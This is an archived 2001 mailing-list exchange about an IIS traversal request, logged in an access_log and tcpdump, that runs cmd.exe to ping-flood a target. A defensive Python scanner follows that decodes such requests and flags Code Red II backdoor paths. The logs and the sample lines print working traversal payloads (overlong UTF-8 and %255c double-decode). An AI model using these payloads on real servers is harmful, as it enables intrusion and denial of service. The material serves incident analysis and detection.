Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool

From: Blake Frantz (blake@mc.net)
Date: 08/08/01


Date: Tue, 7 Aug 2001 18:32:54 -0500 (CDT)
From: Blake Frantz <blake@mc.net>
To: "Eyes to the Skies." <sgtphou@fire-eyes.yi.org>
Subject: Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool
Message-ID: <Pine.BSI.4.05L.10108071829290.9649-100000@maxx.mc.net>


This attack appears to be more related to MS01-026 than Code Red.

-Blake

On Tue, 7 Aug 2001, Eyes to the Skies. wrote:

> Okay, this is scary.
>
> This looks like an attempt to use a CodeRed II infected system to
> perform a denial of service attack. I don't think I need to stress the
> severity of this.
>
> ==> /var/log/apache/access_log <==
> [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted target ip]+"-n"+7000+"-w"+0" 404 -
>
> TCPDUMP: (I have only removed the source, since editing out the target
> IP would bork the dump...)
>
> 17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.www: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win 16616 (DF) (ttl 110, id 7881, len 157)
> 0x0000 4500 009d 1ec9 4000 6e06 f3dd d519 f9a4 E.....@.n.......
> 0x0010 d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0 ..R..9.P/C4...L.
> 0x0020 5018 40e8 4446 0000 4745 5420 2f73 6372 P.@.DF..GET./scr
> 0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/
> 0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe
> 0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v
> 0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l"
> 0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93
> 0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+"
> 0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0..
> 17:19:34.539626 unknown ip 0
> 0x0000 0000 0000 4510 009d 0000 0000 ff06 c196 ....E...........
> 0x0010 d519 f9a4 d8d6 521f 0d39 0050 fc34 432f ......R..9.P.4C/
> 0x0020 fc34 432f 5018 0860 7cff 0000 4745 5420 .4C/P..`|...GET.
> 0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi
> 0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd
> 0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe
> 0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+
> 0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2
> 0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70
> 0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0.
> 0x00a0 0a .
>
> 17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.www: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win 16616 (DF) (ttl 110, id 11022, len 157)
> 0x0000 4500 009d 2b0e 4000 6e06 e798 d519 f9a4 E...+.@.n.......
> 0x0010 d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c ..R....P2*z../:.
> 0x0020 5018 40e8 0814 0000 4745 5420 2f73 6372 P.@.....GET./scr
> 0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/
> 0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe
> 0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v
> 0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l"
> 0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93
> 0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+"
> 0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0..
>
> 17:20:13.919639 unknown ip 0
> 0x0000 0000 0000 4510 009d 0000 0000 ff06 0000 ....E...........
> 0x0010 d519 f9a4 d8d6 521f 1085 0050 e97a 2a32 ......R....P.z*2
> 0x0020 e97a 2a32 5018 0860 5422 0000 4745 5420 .z*2P..`T"..GET.
> 0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi
> 0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd
> 0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe
> 0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+
> 0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2
> 0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70
> 0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0.
> 0x00a0 0a .
>
>
> As an afterthought, I saw a URL drifting around, related to such an
> idea: http://www.iispacket.com/ , although I am not getting that host to
> respond.
>
> I think this needs immediate attention. I can't do it now, I must go to
> school.
> --
>
> http://c64.arcsnet.net/
> ICQ UIN 1551505
> "The things you own, they end up owning you." - Tyler Durden
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>

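The request in the quoted access_log can be checked mechanically rather than by eye. What follows is an added example, not code from either poster: a Python scanner run over constructed Apache access_log lines modelled on the one above (documentation addresses stand in for the real hosts). It decodes the request target the way an unpatched IIS 4/5 did (percent-decoding twice, which is the MS01-026 double-decode case where %255c becomes a backslash, and accepting overlong two-byte UTF-8 sequences such as %c1%9c for '\' and %c0%af for '/', which is the MS00-078 "Web Server Folder Traversal" case), reports whether the path climbs above the web root into a command shell, separates that from Code Red II's own backdoor (the root.exe copy of cmd.exe the worm drops into /scripts and /msadc, and the /c and /d virtual directories it maps to the drive roots), and pulls the ping target out of the injected command. The sample lines, the LOG_RE pattern and the function names are assumptions of this example.

```python
import re
from typing import List, Optional
from urllib.parse import unquote_to_bytes

# Constructed sample log lines (Apache common log format), modelled on the
# access_log entry quoted in the post. Addresses are documentation ranges,
# not the hosts in the post; the first line keeps the original's bare request
# with no HTTP version token.
SAMPLE_LOG = r'''
192.0.2.10 - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+203.0.113.120+"-n"+7000+"-w"+0" 404 -
192.0.2.11 - - [07/Aug/2001:17:21:02 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.12 - - [07/Aug/2001:17:22:40 -0400] "GET /index.html HTTP/1.0" 200 1234
192.0.2.13 - - [07/Aug/2001:17:23:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
192.0.2.14 - - [07/Aug/2001:17:24:05 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
'''

# Hypothetical common-log-format pattern; the request field is matched greedily
# because the injected command itself contains double quotes.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*)" (?P<status>\d{3}) (?P<size>\S+)$'
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
OVERLONG_RE = re.compile(r"%c[01]%[89ab][0-9a-f]", re.I)
# cmd.exe is the usual target; root.exe is the copy of cmd.exe that Code Red II
# drops into /scripts and /msadc so it can be reached without any traversal.
SHELL_NAMES = ("cmd.exe", "root.exe")

def lenient_utf8(data: bytes) -> str:
    """Decode as UTF-8 the permissive way unpatched IIS did: a two-byte sequence
    is accepted even when overlong, so C1 9C -> '\\' and C0 AF -> '/'."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))  # ASCII and anything malformed pass through
            i += 1
    return "".join(out)

def iis_decode(component: str) -> str:
    """Percent-decode twice (MS01-026 double decode: %255c -> %5c -> '\\'), then
    apply the lenient UTF-8 decoding (MS00-078)."""
    return lenient_utf8(unquote_to_bytes(unquote_to_bytes(component)))

def classify(raw_path: str, decoded_path: str) -> str:
    """Name the technique the raw request relies on."""
    if "%25" in raw_path.lower():
        return "double-decode traversal (MS01-026)"
    if OVERLONG_RE.search(raw_path):
        return "overlong UTF-8 traversal (MS00-078)"
    low = decoded_path.lower()
    if low.endswith("/root.exe") or low.startswith(("/c/", "/d/")):
        return "Code Red II backdoor (root.exe or /c, /d virtual directory)"
    return "direct shell request"

def flood_target(command: str) -> Optional[str]:
    """If the injected command runs ping, return the address it is aimed at."""
    if not re.search(r"\bping(?:\.exe)?\b", command, re.I):
        return None
    m = IPV4_RE.search(command)
    return m.group(0) if m else None

def analyse_target(target: str) -> Optional[dict]:
    """Finding for a request target that reaches a shell or climbs above the
    web root; None for anything else."""
    raw_path, _, raw_query = target.partition("?")
    path = iis_decode(raw_path).replace("\\", "/")
    depth, escaped = 0, False
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            escaped = escaped or depth < 0  # climbed above the virtual root
        elif seg and seg != ".":
            depth += 1
    exe = path.rsplit("/", 1)[-1].lower()
    if exe not in SHELL_NAMES and not escaped:
        return None
    command = iis_decode(raw_query).replace("+", " ")  # '+' is the attacker's space
    return {"escaped_root": escaped, "executable": exe,
            "technique": classify(raw_path, path),
            "command": command, "target": flood_target(command)}

def scan(log_text: str) -> List[dict]:
    """Run analyse_target over every request line in an access_log extract."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("req").split(" ")
        if len(parts) < 2:
            continue
        hit = analyse_target(parts[1])
        if hit:
            hit.update(src=m.group("src"), status=m.group("status"))
            findings.append(hit)
    return findings
```

scan(SAMPLE_LOG) returns one finding per flagged line (four for the constructed sample; the plain /index.html request is ignored), each carrying the decoded command and, for the first line, the flood target 203.0.113.120. On Windows, ping -t keeps sending until stopped, -l 65000 sets the payload size, -n the count and -w the reply timeout, so the injected command is a large-packet flood sourced from the compromised host. The 404 in the sample is what Apache answers, because the request was written for IIS; in an IIS log the same request answered with a 200 is the line that matters.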